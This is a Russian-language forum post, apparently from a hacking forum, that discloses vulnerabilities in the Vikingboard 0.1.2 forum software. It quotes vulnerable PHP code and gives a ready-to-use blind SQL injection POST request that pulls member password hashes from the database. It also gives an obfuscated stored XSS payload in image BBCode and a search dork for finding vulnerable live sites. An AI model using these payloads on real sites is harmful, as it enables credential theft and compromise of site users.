29.05.2009, 23:10
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
/////////////////////////
Vikingboard 0.1.2
_http://vikingboard.com
/////////////////////////
Файл с данными для подключения к бд:
/inc/drivers/sql/driver_MySQL.php
Структура базы:
PHP код:
`PREFIX|member`
`id` int(11) NOT NULL auto_increment,
`name` varchar(50) default NULL,
`password` varchar(50) default NULL,
`email` varchar(50) default NULL,
Директории доступные на запись:
/cache/
SQL - инъекция
/members.php
PHP код:
if (empty($_POST['order']))
{
$DESC = 'DESC';
}
else
{
$DESC = $_POST['order'];
}
/inc/drivers/sql/sql_MySQL.php
PHP код:
function get_member_list($order, $desc, $showfrom, $total)
{
$this->database->query("SELECT m.`id`, m.`name`, m.`posts`, m.`registred`, m.`homepage`, m.`title`, m.`group`, g.`g_name`
FROM {$this->prefix}member m, {$this->prefix}group g WHERE g.`id` = m.`group`
ORDER BY m.`{$order}` {$desc} LIMIT {$showfrom},{$total}");
$this->queries++;
return $this->database;
}
Пример эксплоита:
Код:
POST /vig/members.php HTTP/1.0
User-Agent: Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1
Host: localhost
Accept: text/html
order=and if(ord(substring((select password from vboard_member where id=2),1,1))>5,1,(select id from vboard_pm))/*
Актив XSS
/post_parser.php
PHP код:
//BBCode for images
$post = preg_replace("#\[img\]([^\"']+?)\[/img\]#is", "<img src=\"$1\" alt=\"\" />", $post);
Код:
[#img=javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))]loleg![/img#]
склеил с предыдущим постом
Дорк: "Powered by Vikingboard"
|
|
|